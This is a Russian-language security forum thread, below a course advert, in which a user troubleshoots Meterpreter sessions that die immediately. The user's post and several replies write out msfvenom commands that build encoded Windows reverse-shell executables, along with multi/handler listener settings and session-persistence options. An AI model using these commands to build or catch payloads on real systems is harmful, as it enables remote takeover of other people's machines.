• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Проблема Meterpreter session 8 closed. Reason: Died

E

edward876

Доброго время суток. Нуждаюсь в помощи людей который знакомы с metasploit.Проблема такая, я генерирую пейлоад (
msfvenom -a x64 --platform windows -p windows/x64/shell/reverse_tcp LHOST=172.16.104.130 LPORT=443 -b "\x00" -e x64/shikata_ga_nai -f exe -o /tmp/1.exe

), закидаю файл на машину, запускаю файл, и мне прилетает сессия. Но если я закрою метасплоит намерено или случайно, когда я запускаю все так же у меня сессия конектиться и моментально дохнет. На машине какую атакую процесс запускается на пару секунд и умирает. АВ нету, машина пингуется. Помогите найти причину.

1536260520424.png
 
Последнее редактирование модератором:

kot-gor

Grey Team
07.09.2016
529
705
BIT
0
добрый день. скиньте скрин как вы конфигурировали листенер.
 

kravl

Green Team
19.08.2018
54
10
BIT
0
скрином не могу, вот как я настраивал листенер


use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost ip.server
set lport 443
run
Пробовал запускать на другой машине ?
Попробуй создать пейлоад таким макаром и отпишись по итогам.
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > ~/Payload.exe
 

kot-gor

Grey Team
07.09.2016
529
705
BIT
0
добавьте в конфигурацию следующую строчку

set ExitOnSession false

и место run используйте exploit -j

так же попробуйте SessionCommunicationTimeout значения равное нулю.


вообще более подробно можете прочитать здесь:
 

sever0ever

Green Team
23.05.2019
18
14
BIT
0
скрином не могу, вот как я настраивал листенер


use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost ip.server
set lport 443
run
Для, начала приведи к общему значению пэйлоад в листенере(windows/x64/meterpreter/reverse_tcp) и при создании полезной нагрузки( windows/x64/shell/reverse_tcp ). Затем добавь в конфигурацию листенера set ExitOnSession false, exploit -j вместо run(товарищ kot-gor выше об этом написал). И, наконец, поэксперементируй с созданием пэйлоада.
 
  • Нравится
Реакции: kot-gor
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!